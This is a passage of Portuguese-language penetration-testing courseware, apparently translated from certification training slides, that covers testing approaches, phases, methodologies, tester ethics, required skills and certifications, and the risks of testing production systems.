Para simular ataques do mundo real e minimizar falsos positivos, os testadores de penetração podem
optar por realizar testes de caixa preta (ou ataque de conhecimento zero, sem informações ou
assistência do cliente) e mapear a rede enquanto enumera serviços, sistemas de arquivos compartilhados
e sistemas operacionais (SOs) discretamente.
ÿ Testes de caixa branca
Se a organização precisar avaliar sua segurança contra um tipo específico de ataque ou um alvo
específico, informações completas sobre o mesmo podem ser fornecidas aos testadores de penetração.
As informações fornecidas podem incluir documentos de topologia de rede, inventário de ativos e
informações de avaliação. Uma organização normalmente opta por testes de caixa branca quando
requer uma auditoria completa de sua segurança. Independentemente disso, é fundamental observar
que a segurança da informação é um processo contínuo e os testes de penetração fornecem apenas
um instantâneo da postura de segurança de uma organização em um determinado momento.
ÿ Teste de caixa cinza
O teste de penetração de caixa cinza, a abordagem mais comum para segurança de aplicativos, testa
as vulnerabilidades que um invasor pode encontrar e explorar. Esse processo de teste funciona de
maneira semelhante ao teste de caixa preta. Tanto a equipe atacante quanto um usuário normal do
aplicativo recebem os mesmos privilégios, e o objetivo é simular um ataque executado por um insider
mal-intencionado.

Processo de teste de penetração
Definindo o Executando o Relatórios e

Escopo Teste de penetração Entregando Resultados
Extensão do teste Envolve a coleta de todas Listando

as informações significativas vulnerabilidades
O que será
para vulnerabilidades de
testado segurança Categorizando os riscos
como alto, médio ou
Envolve testar o
Onde o teste será baixo
ambiente de destino ,
realizado de
como rede
Recomendar
configuração,
reparos se houver
Quem fará os testes topologia, hardware e vulnerabilidades
software
encontrado
Processo de teste de penetração

O processo de realização de um teste de penetração em uma organização consiste em algumas decisões
críticas sobre as ações tomadas antes de testar os dispositivos de rede e as vulnerabilidades do sistema.
O processo é definido para todas as operações realizadas durante e antes do teste de penetração e
envolve definir o escopo, realizar o teste de penetração e relatar e entregar os resultados.
ÿ Definição do Escopo
Antes de realizar um teste de penetração, é necessário primeiro definir o alcance do teste.

Para diferentes tipos de teste de penetração, existem diferentes tipos de dispositivos de rede. O
teste pode ser um teste em escala total para toda a rede e sistemas ou para dispositivos de destino,
como servidores web, roteadores, firewalls, servidores DNS, servidores de correio e servidores
FTP. O escopo do teste de penetração abrange o seguinte:
o Extensão do teste
o O que será testado
o Onde o teste será realizado de
o Quem realizará os testes
ÿ Realização do Teste de Penetração

Todas as empresas garantem que os processos que implementam para testes de penetração são
adequados. Portanto, um bom teste de penetração requer o uso de metodologias adequadas. O
testador é responsável por verificar o sistema quanto a quaisquer aplicativos, redes e sistemas
existentes ou novos, além de verificar se o sistema está

vulnerável a um risco de segurança que pode permitir o acesso não autorizado. Este processo envolve a
coleta de todas as informações significativas para vulnerabilidades de segurança. Isso também envolve
testar o ambiente de destino, como configuração de rede, topologia, hardware e software.
ÿ Reporte e Entrega de Resultados
Após a conclusão do teste de penetração, os testadores de segurança examinam todas as informações

derivadas do procedimento de teste. O relatório de entrega contém o seguinte:
o Lista de vulnerabilidades e riscos priorizados
o Informações referentes aos pontos fortes e fracos do sistema de segurança existente
o Riscos categorizados como alto, médio ou baixo

o Informações sobre as vulnerabilidades de cada dispositivo
Os testadores fazem recomendações para reparar as vulnerabilidades encontradas e fornecem informações

técnicas sobre como corrigir as vulnerabilidades encontradas no sistema. Eles também podem fornecer
certos recursos úteis para a organização, como links da Internet que podem ser úteis para encontrar
informações adicionais ou patches para reparar vulnerabilidades encontradas.

Fases do Teste de Penetração
Fase Pré-Ataque
01
Pesquisa (Coleta de Informações)
Fase de ataque
02
Teste/Exploração
Fase Pós-Ataque
03
Documentação e relatórios
Fases do Teste de Penetração

Existem três fases no teste de penetração: as fases pré-ataque, ataque e pós-ataque.
ÿ Fase Pré-Ataque
Esta fase se concentra em coletar o máximo de informações possível sobre o alvo.

As informações podem ser coletadas de forma invasiva por meio, por exemplo, de reconhecimento passivo
e ativo, varredura de portas, varredura de serviço e varredura de sistema operacional, ou podem ser
coletadas de maneira não invasiva, por exemplo, revisando registros públicos.
Começando com o reconhecimento passivo e ativo, o testador reúne o máximo de informações

possível sobre a empresa-alvo. A maioria das informações vazadas está relacionada à topologia
da rede e aos tipos de serviços em execução. O testador pode usar essas informações para
mapear provisoriamente a rede para planejar uma estratégia de ataque mais coordenada.
O reconhecimento passivo envolve o seguinte:
o Mapeamento da estrutura de diretórios dos servidores web e servidores
FTP. o Coleta de inteligência competitiva.
o Determinar o valor da infraestrutura de interface com a web.
o Recuperar informações de registro de rede de bancos de dados WHOIS e
sites.
o Determinar a gama de produtos e ofertas de serviços da empresa-alvo que são

disponível online ou pode ser solicitado offline.
o Peneiramento de documentos, que se refere à coleta de informações exclusivamente de
material.

o A engenharia social pode ser realizada identificando um canal (uma pessoa que pode ser facilmente visada
com base nas informações obtidas sobre o pessoal) e traçando seu perfil.
No reconhecimento ativo, o processo de coleta de informações invade o território alvo. Aqui, o perpetrador
pode enviar sondagens ao alvo na forma de varreduras de portas, varreduras de rede, enumeração de
compartilhamentos e contas de usuário e assim por diante. O testador pode adotar técnicas como engenharia
social e usar ferramentas que automatizam essas tarefas, como scanners e sniffers.
ÿ Fase de Ataque
As informações coletadas na fase pré-ataque formam a base da estratégia de ataque.

Durante a fase de ataque, a estratégia de ataque é desenvolvida e executada. Esta fase envolve o
comprometimento real do alvo. O testador pode explorar uma vulnerabilidade descoberta durante a fase de pré-
ataque ou usar brechas de segurança, como uma política de segurança fraca, para obter acesso ao sistema.
O ponto importante aqui é que enquanto o testador precisa de apenas uma porta de entrada, as organizações
devem defender várias. Uma vez dentro, o testador pode aumentar seus privilégios, instalar um backdoor para
manter o acesso ao sistema e explorá-lo para atingir seu objetivo.
ÿ Fase Pós-ataque
A fase pós-ataque é uma parte crucial do processo de teste, pois o testador precisa restaurar a rede ao seu
estado original. Isso envolve a limpeza de processos de teste, remoção de vulnerabilidades criadas (não
aquelas que existiam originalmente), explorações elaboradas e assim por diante, até que todos os sistemas
testados retornem aos seus estados anteriores ao teste.
O objetivo do teste é mostrar onde a segurança falha. A menos que haja um escalonamento do acordo de teste
de penetração, pelo qual o testador é atribuído a responsabilidade de corrigir a postura de segurança dos
sistemas, esta fase completa o processo de teste de penetração.
As atividades nesta fase incluem (mas não estão restritas a) o seguinte:
o Invertendo todas as manipulações de arquivo e configuração realizadas durante o teste
o Reverter todas as alterações nos privilégios e configurações do usuário
o Mapeamento do estado da rede
o Documentar e capturar todos os logs registrados durante o teste
É importante que o testador de penetração documente todas as suas atividades e registre todas as observações
e resultados para que o teste possa ser repetido e verificado para a postura de segurança da organização.
Para que a organização quantifique o risco de segurança em termos de negócios, é essencial que o testador
identifique os sistemas e recursos críticos e mapeie a ameaça a eles.

Metodologias de Teste de Penetração

Existem várias estruturas e metodologias de teste de penetração para ajudar as organizações a escolher o
melhor método para realizar um teste de penetração bem-sucedido
Metodologias mais usadas:

Metodologias Proprietárias Metodologias de código aberto
1 LPT do EC-Council 1 OSSTMM
2 IBM 2 ISSAF
3 ISS
3 NIST
4 McAfee Foundstone
4 OWASP
5 CRISTA
Metodologias de Teste de Penetração

Existem várias estruturas e metodologias de teste de penetração para ajudar as organizações a
escolher o melhor método para realizar um teste de penetração bem-sucedido. A pedra angular de um
teste de penetração bem-sucedido é a metodologia envolvida em criá-lo. A metodologia subjacente
deve ajudar o testador, fornecendo uma abordagem sistemática para o padrão de teste. O teste deve
satisfazer adjetivos como consistência, precisão e eficiência, e a metodologia de teste deve ser
adequada. Isso não significa que toda a estrutura deva ser restritiva.
Os dois tipos de metodologias de teste de penetração são os seguintes:
ÿ Metodologias próprias
Existem muitas organizações que trabalham com testes de penetração e oferecem serviços e
certificações. As organizações de segurança de rede têm suas próprias metodologias que
devem ser mantidas em sigilo. A seguir estão algumas metodologias proprietárias:
o Testador de Penetração Licenciado do EC-Council (LPT)
o IBM
o ISS
o McAfee Foundstone

ÿ Metodologias open-source e públicas
Uma ampla gama de metodologias está disponível publicamente. Eles podem ser usados por qualquer pessoa e
destinam-se apenas ao uso público.
o Manual de Metodologia de Teste de Segurança de Código Aberto
O Manual de Metodologia de Teste de Segurança de Código Aberto foi compilado por Pete Herzog.
É um padrão definido para testes de penetração para alcançar métricas de segurança. É considerado o nível
mais alto de teste de fato e garante alta consistência e notável
precisão.
o Estrutura de Avaliação de Segurança de Sistemas de Informação
A Estrutura de Avaliação de Segurança de Sistemas de Informação avalia os processos e políticas de

segurança da informação de uma organização.
o Instituto Nacional de Padrões e Tecnologia
O Instituto Nacional de Padrões e Tecnologia (NIST) é uma agência federal de tecnologia que trabalha com a
indústria para desenvolver e aplicar tecnologia, medições e padrões.
o Projeto de Segurança de Aplicações Web Abertas
O Open Web Application Security Project é uma metodologia de código aberto. Ele fornece um conjunto de
ferramentas e uma base de conhecimento, que ajudam na proteção de aplicativos e serviços da web. É
benéfico para arquitetos de sistema, fornecedores, desenvolvedores, profissionais de segurança e
consumidores que podem trabalhar no projeto, desenvolvimento, implantação e teste de segurança de serviços
e aplicativos da web.
o CRISTA
O CREST é o órgão sem fins lucrativos de credenciamento e certificação que representa o setor de segurança
da informação técnica. O CREST fornece credenciamento reconhecido internacionalmente para organizações
e indivíduos que fornecem testes de penetração, resposta a incidentes cibernéticos e serviços de inteligência
contra ameaças.

Fluxo do módulo
de Testes de Penetração e seus
Benefícios
02
Discutir estratégias e fases do teste de
penetração
03 Diretrizes e recomendações
para teste de penetração
Diretrizes e recomendações para testes de penetração

Além das habilidades técnicas, um testador de penetração deve possuir algumas habilidades essenciais,
como boas habilidades de comunicação, habilidades de redação de relatórios, ética, bom senso de vestir,
certificações e experiência. Esta seção descreve os fundamentos do teste de penetração.

Características de um bom teste de penetração
Estabelecer os parâmetros do teste de penetração, como objetivos, limitações e justificativa de

procedimentos
Contratação de profissionais qualificados e experientes para realizar o teste
Escolhendo um conjunto adequado de testes que equilibram custo e benefícios
Seguindo uma metodologia com planejamento e documentação adequados
Documentar o resultado cuidadosamente e torná-lo compreensível para o cliente
Características de um bom teste de penetração
Antes de realizar qualquer pentest em uma organização, o testador deve seguir alguns passos para garantir o sucesso.
Primeiro, a organização deve convocar uma reunião, na qual devem discutir o escopo e os objetivos do teste de
penetração e as partes envolvidas nele. Os objetivos são importantes porque descrevem que existem vulnerabilidades
exploráveis na infraestrutura da organização. Os objetivos do teste de penetração devem ser claros; se o objetivo não
for claro, os resultados serão inevitavelmente imprecisos. Em seguida, são identificados os sistemas, máquinas, rede,
pessoal envolvido e requisitos operacionais para realizar o teste de penetração.
Outra agenda importante é o tempo e a duração do teste de penetração; esses fatores devem ser decididos de forma
que as operações diárias e os negócios normais da organização não sejam perturbados. Nenhuma organização deseja
que seus negócios sejam afetados por um teste de penetração.
Portanto, a organização deve garantir que o teste de penetração seja realizado em um determinado horário do dia
porque, às vezes, o teste de penetração pode levar a um tráfego de rede incomum, o que pode causar a falha de alguns
sistemas da rede e afetar outros sistemas em funcionamento na rede. rede. Para superar tais situações, a organização
deve traçar um plano claro antes de prosseguir.
A seguir estão mais alguns pontos sobre as características de um bom teste de penetração:
ÿ Estabelecer os parâmetros do teste de penetração como objetivos, limitações e justificativa de procedimentos
ÿ Contratação de profissionais qualificados e experientes para a realização do teste
ÿ Escolhendo um conjunto adequado de testes que equilibrem custo e benefícios
ÿ Seguindo uma metodologia com planejamento e documentação adequados
ÿ Documentar cuidadosamente o resultado e torná-lo compreensível para o cliente

Quando o Pen Testing deve ser realizado?

O teste de penetração geralmente é realizado nos seguintes casos:
01 Mudanças foram feitas na infraestrutura da

organização
02 Uma nova ameaça à infraestrutura da

organização foi descoberta
Hardware ou software foi atualizado ou

03 reinstalado
A política da organização mudou

04
Quando o Pen Testing deve ser realizado?

Os testes de penetração devem ser realizados regularmente para garantir que todas as vulnerabilidades
existentes e recém-descobertas sejam identificadas e corrigidas antes que um cibercriminoso as
explore. Nos últimos tempos, muitos novos ataques foram relatados, o que indica que até os hackers
estão tentando novas metodologias e técnicas. Uma organização deve estar preparada com soluções
para qualquer novo tipo de ataque. No entanto, a maioria das empresas negligencia a possibilidade de
tal situação e espera muito tempo para realizar testes de penetração; eles realizam testes quando é
exigido por lei ou, no pior dos casos, apenas quando uma empresa já foi violada.
A questão de quando o teste de penetração deve ser realizado é difícil de responder porque a resposta
depende da empresa. Por exemplo, empresas de alto perfil que são frequentemente mencionadas na
mídia são as mais propensas a ataques. Essas empresas devem realizar regularmente testes de
penetração.
A seguir estão alguns cenários em que o teste de penetração é necessário:
ÿ Foram feitas alterações na infraestrutura da organização.
ÿ Foi descoberta uma nova ameaça à infraestrutura da organização.
ÿ Hardware ou software foi atualizado ou reinstalado.
ÿ A política da organização mudou.

Ética de um testador de penetração
Realize testes de penetração com a permissão expressa por escrito do cliente

01
02 Trabalhe de acordo com as cláusulas de não divulgação e responsabilidade de um contrato
03 Ferramentas de teste em um laboratório isolado antes de um teste de penetração real
Informar o cliente sobre quaisquer possíveis riscos que possam emanar dos testes
04
05 Notifique o cliente na primeira descoberta de quaisquer falhas altamente vulneráveis
Forneça resultados de teste de engenharia social apenas em um formato

06 resumido e estatístico
Tente manter um grau de separação entre o hacker criminoso e o profissional de

07 segurança
Ética de um testador de penetração
Todo testador de penetração deve ter uma ética que os ajude a evitar atividades ilegais e atender melhor seus
clientes. A maioria das organizações faz com que o testador assine um acordo para esclarecer as leis vigentes e
proteger seus clientes. As leis podem diferir de país para país. Portanto, é muito importante para um testador de
penetração estar ciente das leis atuais e acordos legais com uma organização, e o testador deve ser altamente ético
e totalmente profissional em todos os momentos.
A seguir estão alguns dos requisitos éticos de um testador de penetração:
ÿ Realizar testes de penetração com a permissão expressa por escrito do cliente.
ÿ Trabalhar de acordo com as cláusulas de sigilo e responsabilidade de um contrato.
ÿ Ferramentas de teste em um laboratório isolado antes de um teste de penetração real.
ÿ Informar o cliente sobre os possíveis riscos que possam advir dos testes.
ÿ Notifique o cliente na primeira descoberta de quaisquer falhas altamente vulneráveis.
ÿ Forneça resultados de testes de engenharia social apenas em um formato resumido e estatístico.
ÿ Tentar manter um grau de separação entre o hacker criminoso e a segurança

profissional.

Evoluindo como um testador de penetração
1 2 3 4
As tecnologias evoluem e Olhe para fora do Participe de conferências, Participe de vários grupos
mudam local de trabalho para expandir workshops e treinamentos de segurança e discuta
o conhecimento tópicos atuais relacionados
à segurança
5 6 7 8
Mantenha sua carreira viva Leia livros, jornais e revistas Visite vários sites e fóruns Visite bibliotecas e
atualizando constantemente especializadas de segurança livrarias para coletar

sua área de conhecimento e informações
conjunto de habilidades
Evoluindo como um testador de penetração
O primeiro e mais importante requisito para ser um pen tester é a vontade de estudar e realizar pesquisas continuamente
neste campo. Como o campo de TI está evoluindo continuamente e modernizando a experiência do usuário para
acompanhar o rápido avanço da tecnologia, um testador de penetração deve estar atualizado e ter habilidades afiadas
para permanecer um passo à frente dos hackers mal-intencionados. Até os hackers se mantêm atualizados com as novas
tecnologias e desenvolvem novos métodos e técnicas.
Antes de explorar com sucesso uma vulnerabilidade, o testador de penetração deve estar preparado para enfrentar seus
ataques e estar ciente das novas tecnologias e ferramentas. O testador deve procurar fora de seu local de trabalho para
expandir seus conhecimentos.
Mesmo um testador de penetração experiente deve consultar guias gratuitos, vídeos, tutoriais, livros, periódicos, revistas
especializadas e assim por diante e participar de webinars, conferências, workshops e treinamentos.
Os testadores de penetração se juntam a vários grupos de segurança e discutem tópicos atuais relacionados à segurança
e visitam regularmente vários sites e fóruns de segurança. Eles também visitam bibliotecas e livrarias para coletar
informações. Os testadores de caneta mantêm sua carreira viva atualizando constantemente sua área de conhecimento e
conjunto de habilidades.
Existem várias maneiras de aperfeiçoar a arte do teste de caneta. Além de um diploma formal, um diploma de ciência da
computação com um programa de teste de penetração certificado pode ajudar um testador de penetração a se tornar mais
avançado e obter experiência em uma área especializada.

Qualificação, Experiência, Certificações e

Habilidades necessárias para um testador de caneta
ÿ A qualidade do teste de penetração depende das qualificações do testador ÿ
Habilidades de teste de penetração não podem ser obtidas sem anos de experiência em áreas de TI, como
desenvolvimento, administração de sistemas ou consultoria
ÿ O testador deve possuir certificações de segurança como CEH, CPENT, CISSP e CISA
1 2 3 4 5
Rede – Transmissão Técnicas de hacking ético – exploits, Tecnologias de Protocolos e dispositivos sem fio Habilidades de solução de problemas
Protocolo de controle/Internet ferramentas de hacking, etc. código aberto – MySQL e Apache – 802.11x e Bluetooth
Conceitos de protocolo (TCP/IP) e

técnicas de cabeamento
6 7 8 9 10
Roteadores, firewalls e Bancos de dados – Oracle e Habilidades de sistema operacional - Arquitetura de aplicações Servidores Web, servidores de correio,
sistemas de detecção de intrusão MSSQL Windows, Linux, web e hipertexto Gerenciamento de Rede Simples
(IDS) Mainframe e Mac Conceitos de solicitação e Estações de protocolo (SNMP),
resposta do protocolo de dispositivos de acesso
transferência (HTTP)
Qualificação, experiência, certificações e habilidades necessárias para um testador de caneta
A qualidade do teste de penetração depende das qualificações do testador. As habilidades de teste de penetração não
podem ser obtidas sem anos de experiência em áreas de TI, como desenvolvimento, administração de sistemas ou
consultoria. Um testador de penetração deve possuir certificações de segurança como CEH, CPENT, CISSP e CISA.
ÿ Qualificação
O testador de penetração profissional deve possuir as seguintes qualificações:
o Registro Certificado de Testadores de Segurança Ética (CREST)
o Certificações de segurança cibernética (CHECK, CTM, CTL, CREST, TIGER, OSCP)
o Um diploma em segurança de computadores, ciência da computação ou equivalente
o Certificações de testes de segurança reconhecidas (GIAC e CEH)
ÿ Experiência
o Um testador de penetração profissional deve ter conhecimento sólido e experiência no manuseio de várias
ferramentas de teste de penetração, incluindo mapeamento aberto e comercial.
o Eles devem possuir experiência em sistemas, redes e aplicativos baseados na web.
o Experiência no uso de técnicas de resolução de problemas e desenvolvimento de uma solução para atender
ameaças de vulnerabilidade é desejável.
o Eles devem possuir boas habilidades de comunicação para explicar detalhes técnicos para
partes não técnicas.

o Eles devem ser proficientes em redação de relatórios e habilidades de script e ter boa experiência em
engenharia reversa.
o Experiência em consultoria é uma vantagem adicional porque eles devem entender o

necessidades do cliente e construir um relacionamento positivo com eles.
ÿ Certificações
o CEH: Certified Ethical Hacker
o CPENT: Profissional certificado em testes de penetração
o CEPT: Certified Expert Penetration Tester
o GPEN: testador de penetração certificado pelo GIAC
o OSCP: Offensive Security Certified Professional
o CISSP: Certified Information Systems Security Professional
o GCIH: GIAC Certified Incident Handler
o GCFE: GIAC Certified Forensic Examiner
o GCFA: GIAC Certified Forensic Analyst
o CCFE: Certified Computer Forensics Examiner
o CREA: Analista Certificado de Engenharia Reversa
o CPTC: Consultor certificado em testes de penetração
o CPTE: Engenheiro Certificado de Testes de Penetração
o CompTIA: Segurança+
o CSTA: Certified Security Testing Associate
ÿ Conjuntos de habilidades necessárias de um testador de penetração
Um testador de penetração profissional deve possuir os seguintes conjuntos de habilidades:
o Forte conhecimento de tecnologias, metodologias e ferramentas atuais e emergentes em

a indústria de segurança
o Familiaridade com conceitos de segurança de rede, arquitetura e design de software e

processos de engenharia
o Conhecimento de conceitos de hardware, como os seguintes:
• Rede: conceitos de Transmission Control Protocol/Internet Protocol (TCP/IP) e técnicas de cabeamento
• Técnicas de hacking ético: exploits, ferramentas de hacking e assim por diante.
• Tecnologias de código aberto: MySQL e Apache
• Protocolos e dispositivos sem fio: 802.11x e Bluetooth
• Habilidades de solução de problemas

• Roteadores, firewalls e IDS
• Bancos de dados: Oracle e MSSQL
• Habilidades de SO: Windows, Linux, Mainframe e Mac
• Arquitetura de aplicativo da Web e solicitação de protocolo de transferência de hipertexto (HTTP) e

conceitos de resposta
• Servidores Web, servidores de correio, Simple Network Management Protocol (SNMP)

estações e dispositivos de acesso

Habilidades de comunicação
de um testador de penetração
Um testador de penetração deve ter fortes

habilidades interpessoais e de comunicação
Eles devem ter uma capacidade comprovada

de explicar a saída de um teste de
penetração para um cliente não técnico
Eles devem ter boas

habilidades de apresentação
e redação de relatórios
Habilidades de comunicação de um testador de penetração
Um testador de penetração requer fortes habilidades interpessoais e de comunicação. Um testador de penetração

sênior deve interagir diretamente com o cliente para entender seus requisitos, criar uma estrutura, documentar as
regras de engajamento e determinar o escopo do trabalho; eles também devem produzir um relatório de nível
profissional e apresentá-lo ao cliente. Um testador de penetração deve ter uma capacidade comprovada de explicar a
saída de um teste de penetração para um cliente não técnico. Finalmente, o testador de penetração deve ter boas
habilidades de redação e apresentação de relatórios.

Perfil de um bom testador de penetração
O currículo de um bom testador de penetração deve incluir algum/todos os

pontos listados abaixo:
ÿ Realização de pesquisa e desenvolvimento em segurança
ÿ Trabalhos de investigação publicados
ÿ Apresentado em vários seminários locais e internacionais
ÿ Possui diversas certificações
ÿ Membro de reputadas organizações como IEEE
ÿ Livros escritos e publicados relacionados à segurança
O testador precisa se promover por meio dessas atividades se

quiser que as organizações o considerem como um pen tester
Perfil de um bom testador de penetração
É muito importante preparar um bom currículo antes de se candidatar a qualquer emprego; deve descrever precisamente as
habilidades e experiências do candidato que são adequadas para o trabalho. O perfil forma a primeira impressão para o
empregador julgar se um candidato é adequado como testador de penetração. Alguns aspectos precisam ser destacados no
currículo para que o empregador possa passar rapidamente por ele, e o currículo deve ser curto e preciso.
Um bom testador de penetração terá o seguinte em seu currículo:
ÿ Realização de pesquisa e desenvolvimento em segurança
ÿ Trabalhos de investigação publicados
ÿ Apresentado em vários seminários locais e internacionais
ÿ Possui diversas certificações
ÿ Membro de várias organizações de renome, como IEEE
ÿ Livros escritos e publicados relacionados à segurança
ÿ Experiência anterior como pen tester
ÿ Desenvolvimento de ferramentas de software de segurança de código aberto
ÿ Participação em concursos “capture the flag” e hackathons
ÿ Conquistas como valorização de uma organização pelo trabalho na melhoria de seus

segurança
ÿ Conduziu uma palestra em uma conferência internacional de segurança para um tema escolhido de relevância
ÿ Possui configurações de código em projetos de segurança de código aberto

ÿ Conjunto de competências profissionais
ÿ Texto isento de erros tipográficos e gramaticais, indicando capacidade de escrita impecável

relatórios técnicos
As empresas tomam decisões com base nas informações disponíveis sobre a implantação do pen tester.
Portanto, o pen tester deve incluir e destacar os critérios acima mencionados para obter o contrato da
administração. O testador deve se promover por meio dessas atividades.

Responsabilidades de um testador de penetração
Definindo claramente os objetivos do teste de

Realização de testes de penetração e
avaliação de risco do sistema de destino 1 2 penetração , garantindo qualidade superior e
comunicando os resultados de forma eficaz
Explorar vulnerabilidades do sistema

3 e justificar as vulnerabilidades encontradas
Compreender a segurança dos
servidores, sistemas de rede e
firewalls da organização relevantes para 5
os riscos de negócios específicos
Apresentar relatórios aos superiores sobre a

eficiência dos testes e avaliações de risco, bem como
4 propostas de mitigação de risco
Responsabilidades de um testador de penetração
Freqüentemente, os testadores de penetração são chamados de hackers éticos porque violam uma rede ou sistema com
permissão prévia ou acordo com a pessoa ou organização em questão; sem essa permissão ou acordo prévio, eles são
simplesmente hackers. As empresas contratam principalmente testadores de penetração para entender se alguma parte
de sua infraestrutura ou rede é vulnerável a ataques e determinar a existência de falhas de segurança que um hacker
pode explorar facilmente.
Um testador de penetração deve, portanto, executar vários testes e preparar um relatório de avaliação detalhando os
testes e seus resultados. Frequentemente, o testador executa tipos predefinidos de testes e também projeta seus próprios
testes para explorar vulnerabilidades; para projetar um teste personalizado, o testador requer muita criatividade e
imaginação com alto nível de conhecimento técnico.
Além disso, um testador de penetração tem as seguintes responsabilidades:
ÿ Realizar o teste de penetração e avaliação de risco do sistema de destino.
ÿ Defina claramente os objetivos do teste de penetração, garanta qualidade superior e comunique os resultados com
eficácia.
ÿ Explorar vulnerabilidades do sistema e justificar as vulnerabilidades encontradas.
ÿ Apresentar relatórios aos superiores sobre a eficácia dos testes e avaliações de risco, bem como
propostas de mitigação de riscos.
ÿ Compreender a segurança dos servidores, sistemas de rede e firewalls da organização

relevantes para riscos de negócios específicos
ÿ Criar e projetar novas ferramentas de penetração para testar vulnerabilidades.
ÿ Identificar os métodos e técnicas que um invasor pode usar para explorar os pontos fracos
e falhas lógicas.

ÿ Executar engenharia social para descobrir políticas de senha ou práticas de segurança do usuário ruins em uma
organização.
ÿ Realizar avaliações de segurança física de servidores, sistemas e dispositivos de rede.
ÿ Investigue aplicativos da Web, aplicativos cliente e aplicativos padrão para qualquer

vulnerabilidades.
ÿ Incluir todas as considerações de negócios, como perda devido ao tempo de inatividade e custo de contratação
em estratégias de segurança.
ÿ Revisar e definir requisitos para soluções de segurança da informação.
ÿ Forneça feedback, o que é muito importante para a organização corrigir problemas de segurança.

Riscos Associados à Penetração

teste
ÿ Alguns dos riscos decorrentes do teste de penetração são os seguintes:
ÿ Os testadores podem obter acesso a dados protegidos/sensíveis após uma

tentativa de teste de penetração
ÿ Os testadores podem obter informações sobre as vulnerabilidades existentes na infraestrutura

organizacional
ÿ Testes de penetração DoS podem derrubar os serviços da organização
ÿ Usar certos pretextos em uma tentativa de penetração de engenharia social pode fazer com que
os funcionários se sintam desconfortáveis
ÿ As organizações podem evitar tais riscos assinando um acordo de confidencialidade

(NDA) e outros documentos legais, que incluem o que é permitido e o que não é permitido para a
equipe de teste de penetração
Riscos associados ao teste de penetração
Envolvimento, planejamento e execução cuidadosos são necessários para evitar quaisquer riscos associados ao teste
de penetração. Uma organização pode assumir certos riscos quando planeja realizar uma penetração
teste.
Alguns dos riscos decorrentes do teste de penetração são os seguintes:
ÿ Os testadores podem obter acesso a dados protegidos/sensíveis após um teste de penetração bem-sucedido
tentar.
ÿ Testers podem obter informações sobre vulnerabilidades existentes na organização

a infraestrutura.
ÿ Os testes de penetração DoS podem derrubar os serviços da organização.
ÿ Usar certos pretextos em uma tentativa de penetração de engenharia social pode fazer com que os funcionários
sentir-se envergonhado, inquieto e desconfortável.
As organizações podem evitar tais riscos assinando um acordo de confidencialidade (NDA) e outros documentos legais,
que incluem o que é permitido e o que não é permitido para a equipe de teste de penetração.

Tipos de riscos
decorrentes da penetração
teste
Riscos Técnicos Riscos Organizacionais Riscos Legais
ÿ Este tipo de riscos surge diretamente ÿ Este tipo de riscos pode ocorrer como ÿ Este tipo de riscos decorre de
com alvos na produção efeito colateral do teste de penetração obrigações legais
meio Ambiente
ÿ Exemplos: ÿ Acionamento repetitivo e ÿ Exemplos:
indesejado no tratamento de incidentes
ÿ Exemplos: ÿ Violação de leis e cláusulas nas
regras de engajamento (ROE)
ÿ Falha do alvo processos
ÿ Negligência no monitoramento e
ÿ Interrupção do serviço resposta a incidentes ÿ Interrupção
na continuidade do negócio ÿ Perda de
ÿ Perda ou exposição de dados sensíveis
reputação
Tipos de riscos decorrentes do teste de penetração
Durante um teste de penetração, algumas atividades podem representar certos riscos e colocar a organização em
situações indesejadas, como uma condição DoS, bloqueio de contas críticas ou falha de servidores e aplicativos críticos.
A seguir estão os tipos de riscos decorrentes do teste de penetração:
ÿ Riscos técnicos
Esse tipo de risco surge diretamente com alvos no ambiente de produção. Inclui o seguinte.
o Falha do alvo: O teste consome continuamente uma grande quantidade de recursos do sistema alvo. Isso
pode resultar na indisponibilidade de serviços da máquina de destino.
o Interrupção do serviço: O processo de teste pode interromper alguns serviços críticos.
o Perda ou exposição de dados sigilosos: A organização precisa compartilhar dados sigilosos com os
pentesters, o que pode resultar na exposição de dados sigilosos.
ÿ Riscos Organizacionais
Esse tipo de risco pode ocorrer como efeito colateral do teste de penetração. Inclui o seguinte.
o Acionamento repetitivo e indesejado nos processos de tratamento de incidentes do

organização
o Negligência em monitorar e responder a incidentes durante ou após o pen test
o Interrupção na continuidade dos negócios

o Perda de reputação
ÿ Riscos legais
Este tipo de riscos decorre de obrigações legais por questões de compliance. Inclui a violação
de leis e cláusulas das regras de engajamento (ROE).

Abordando os riscos associados ao teste de penetração e

evitando possíveis condições de DoS
Usar testes indiretos 01

Tenha cuidado contra o uso
05 Ferramentas limitadas
Abster-se de Vulnerabilidade
Exploração
02
Esteja ciente da conta

06
Atrasar o efeito do teste 03 Funcionalidade de bloqueio
Use isolamento parcial e

07 Replicação do alvo
Desempenho Interruptível Meio Ambiente
teste
04
Abordando os riscos associados ao teste de penetração e evitando o potencial

Termos DoS
Extremo cuidado deve ser tomado para garantir que as ações do testador de penetração não prejudiquem o sistema
em teste. O testador deve usar técnicas de teste de baixo risco para facilitar isso.
A seguir estão as diretrizes para minimizar os riscos associados ao teste de penetração e evitar possíveis condições
de DoS:
ÿ Use testes indiretos: Isso envolve a coleta de evidências suficientes para provar que uma determinada
vulnerabilidade provavelmente existe, em vez de testá-la diretamente.
ÿ Abster-se de explorar vulnerabilidades: os testadores devem abster-se de explorar vulnerabilidades

diretamente. Em vez disso, eles devem preferir mostrar a existência de vulnerabilidades específicas e como
elas podem ser exploradas.
ÿ Atrasar o efeito de um teste: Os testadores devem tentar atrasar o efeito da execução de um determinado
teste. Isso ajudará a fornecer tempo suficiente para cancelar e evitar riscos indesejados que possam surgir
do teste.
ÿ Executar testes interrompíveis: os testadores devem ser capazes de pausar um determinado teste se acharem
que este teste pode causar consequências não intencionais.
ÿ Tenha cuidado ao usar ferramentas limitadas: As ferramentas limitadas podem executar vários testes
simultaneamente e podem sobrecarregar o alvo.
ÿ Esteja ciente da funcionalidade de bloqueio de conta: A repetição de um determinado teste pode resultar em
a ativação de uma funcionalidade de bloqueio de conta.

ÿ Use isolamento parcial e replicação do ambiente de destino: Se possível, o teste deve ser executado
em um sistema de teste dedicado para evitar quaisquer riscos associados, como situações relacionadas
a DoS.
ÿ Use endereços reservados: Se possível, use endereços reservados como entrada de teste para evitar
afetando outros sistemas ou usuários.

Resumo do Módulo
Este módulo discutiu os fundamentos do teste de penetração e

seus benefícios
Cobriu vários tipos de testes de penetração
Também discutiu estratégias e fases do teste de

penetração em detalhes
Este módulo também discutiu várias metodologias de teste

de penetração
Por fim, este módulo terminou com uma discussão detalhada

sobre diretrizes e recomendações para testes de penetração
Resumo do Módulo
Este módulo discutiu os fundamentos do teste de penetração e seus benefícios. Ele também
